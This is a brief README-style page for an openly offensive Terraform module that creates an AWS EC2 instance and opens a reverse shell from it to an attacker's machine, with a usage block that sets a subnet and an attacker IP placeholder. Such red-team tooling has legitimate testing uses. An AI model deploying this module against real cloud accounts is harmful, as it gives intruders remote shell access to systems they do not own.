Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.
module "ec2-instance-reverse-shell" {
source = "offensive-terraform/ec2-instance-reverse-shell/aws"
subnet_id = "subnet-0a4a1cc04"
attacker_ip = "0.0.0.0"
}
Module managed by https://github.com/iganbold